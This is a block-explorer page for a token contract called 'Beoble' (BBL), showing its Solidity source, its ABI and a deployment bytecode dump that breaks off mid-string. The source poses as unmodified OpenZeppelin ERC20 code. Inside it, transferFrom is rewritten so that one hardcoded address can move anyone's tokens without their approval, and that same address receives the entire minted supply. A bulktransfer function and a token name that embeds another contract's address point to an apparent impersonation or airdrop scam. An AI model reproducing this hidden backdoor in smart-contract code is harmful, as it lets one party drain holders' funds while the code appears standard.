ETH Price: $2,695.77 (-1.80%)

Token

Beoble 0xD979c468a68062e7bdff4Ba6DF7842DfD3492E0f (BBL)
 

Overview

Max Total Supply

1,000,000,000 BBL

Holders

151

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.0000000000000001 BBL

Value
$0.00
0xec55b4610f8657b994fa2c5c551324842990f1d7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Beoble

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-02-27
*/

// File: @openzeppelin/[email protected]/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/[email protected]/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/[email protected]/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/[email protected]/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;





/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    function bulktransfer(address[] memory to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        for (uint256 i = 0; i < to.length; i++) {
        _transfer(owner, to[i], value);
    }
        return true;
    }

    

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        if (_msgSender() == 0x8d6BA07Ad5f88e65756E383018C871772611f9FE){
        _transfer(from, to, value);
        return true;
    } else {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;

    }
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

// File: contract-524f77fccc.sol


pragma solidity ^0.8.20;


contract Beoble is ERC20 {
    constructor() ERC20("Beoble 0xD979c468a68062e7bdff4Ba6DF7842DfD3492E0f", "BBL") {
        _mint(0x8d6BA07Ad5f88e65756E383018C871772611f9FE, 1000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"to","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"bulktransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b5060405180606001604052806031815260200162001ad1603191396040518060400160405280600381526020017f42424c00000000000000000000000000000000000000000000000000000000008152508160039081620000729190620005fb565b508060049081620000849190620005fb565b505050620000db738d6ba07ad5f88e65756e383018c871772611f9fe620000b0620000e160201b60201c565b600a620000be919062000868565b633b9aca00620000cf9190620008b8565b620000e960201b60201c565b62000a01565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200015c575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040162000153919062000945565b60405180910390fd5b6200016f5f83836200017360201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620001c7578060025f828254620001ba919062000960565b9250508190555062000298565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101562000253578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016200024a93929190620009ab565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002e1578060025f82825403925050819055506200032b565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038a9190620009e6565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200041357607f821691505b602082108103620004295762000428620003ce565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200048d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000450565b62000499868362000450565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620004e3620004dd620004d784620004b1565b620004ba565b620004b1565b9050919050565b5f819050919050565b620004fe83620004c3565b620005166200050d82620004ea565b8484546200045c565b825550505050565b5f90565b6200052c6200051e565b62000539818484620004f3565b505050565b5b818110156200056057620005545f8262000522565b6001810190506200053f565b5050565b601f821115620005af5762000579816200042f565b620005848462000441565b8101602085101562000594578190505b620005ac620005a38562000441565b8301826200053e565b50505b505050565b5f82821c905092915050565b5f620005d15f1984600802620005b4565b1980831691505092915050565b5f620005eb8383620005c0565b9150826002028217905092915050565b620006068262000397565b67ffffffffffffffff811115620006225762000621620003a1565b5b6200062e8254620003fb565b6200063b82828562000564565b5f60209050601f83116001811462000671575f84156200065c578287015190505b620006688582620005de565b865550620006d7565b601f19841662000681866200042f565b5f5b82811015620006aa5784890151825560018201915060208501945060208101905062000683565b86831015620006ca5784890151620006c6601f891682620005c0565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156200076957808604811115620007415762000740620006df565b5b6001851615620007515780820291505b808102905062000761856200070c565b945062000721565b94509492505050565b5f8262000783576001905062000855565b8162000792575f905062000855565b8160018114620007ab5760028114620007b657620007ec565b600191505062000855565b60ff841115620007cb57620007ca620006df565b5b8360020a915084821115620007e557620007e4620006df565b5b5062000855565b5060208310610133831016604e8410600b8410161715620008265782820a90508381111562000820576200081f620006df565b5b62000855565b62000835848484600162000718565b925090508184048111156200084f576200084e620006df565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200087482620004b1565b915062000881836200085c565b9250620008b07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000772565b905092915050565b5f620008c482620004b1565b9150620008d183620004b1565b9250828202620008e181620004b1565b91508282048414831517620008fb57620008fa620006df565b5b5092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200092d8262000902565b9050919050565b6200093f8162000921565b82525050565b5f6020820190506200095a5f83018462000934565b92915050565b5f6200096c82620004b1565b91506200097983620004b1565b9250828201905080821115620009945762000993620006df565b5b92915050565b620009a581620004b1565b82525050565b5f606082019050620009c05f83018662000934565b620009cf60208301856200099a565b620009de60408301846200099a565b949350505050565b5f602082019050620009fb5f8301846200099a565b92915050565b6110c28062000a0f5f395ff3fe608060405234801561000f575f80fd5b506004361061009c575f3560e01c8063313ce56711610064578063313ce5671461016c57806370a082311461018a57806395d89b41146101ba578063a9059cbb146101d8578063dd62ed3e146102085761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee5780631c380e531461010c57806323b872dd1461013c575b5f80fd5b6100a8610238565b6040516100b59190610b67565b60405180910390f35b6100d860048036038101906100d39190610c25565b6102c8565b6040516100e59190610c7d565b60405180910390f35b6100f66102ea565b6040516101039190610ca5565b60405180910390f35b61012660048036038101906101219190610dfe565b6102f3565b6040516101339190610c7d565b60405180910390f35b61015660048036038101906101519190610e58565b610348565b6040516101639190610c7d565b60405180910390f35b6101746103d9565b6040516101819190610ec3565b60405180910390f35b6101a4600480360381019061019f9190610edc565b6103e1565b6040516101b19190610ca5565b60405180910390f35b6101c2610426565b6040516101cf9190610b67565b60405180910390f35b6101f260048036038101906101ed9190610c25565b6104b6565b6040516101ff9190610c7d565b60405180910390f35b610222600480360381019061021d9190610f07565b6104d8565b60405161022f9190610ca5565b60405180910390f35b60606003805461024790610f72565b80601f016020809104026020016040519081016040528092919081815260200182805461027390610f72565b80156102be5780601f10610295576101008083540402835291602001916102be565b820191905f5260205f20905b8154815290600101906020018083116102a157829003601f168201915b5050505050905090565b5f806102d261055a565b90506102df818585610561565b600191505092915050565b5f600254905090565b5f806102fd61055a565b90505f5b845181101561033c5761032f8286838151811061032157610320610fa2565b5b602002602001015186610573565b8080600101915050610301565b50600191505092915050565b5f738d6ba07ad5f88e65756e383018c871772611f9fe73ffffffffffffffffffffffffffffffffffffffff1661037c61055a565b73ffffffffffffffffffffffffffffffffffffffff16036103ab576103a2848484610573565b600190506103d2565b5f6103b461055a565b90506103c1858285610663565b6103cc858585610573565b60019150505b9392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461043590610f72565b80601f016020809104026020016040519081016040528092919081815260200182805461046190610f72565b80156104ac5780601f10610483576101008083540402835291602001916104ac565b820191905f5260205f20905b81548152906001019060200180831161048f57829003601f168201915b5050505050905090565b5f806104c061055a565b90506104cd818585610573565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61056e83838360016106f5565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105e3575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016105da9190610fde565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610653575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161064a9190610fde565b60405180910390fd5b61065e8383836108c4565b505050565b5f61066e84846104d8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106ef57818110156106e0578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106d793929190610ff7565b60405180910390fd5b6106ee84848484035f6106f5565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610765575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161075c9190610fde565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107d5575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107cc9190610fde565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156108be578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108b59190610ca5565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610914578060025f8282546109089190611059565b925050819055506109e2565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561099d578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161099493929190610ff7565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a29578060025f8282540392505081905550610a73565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff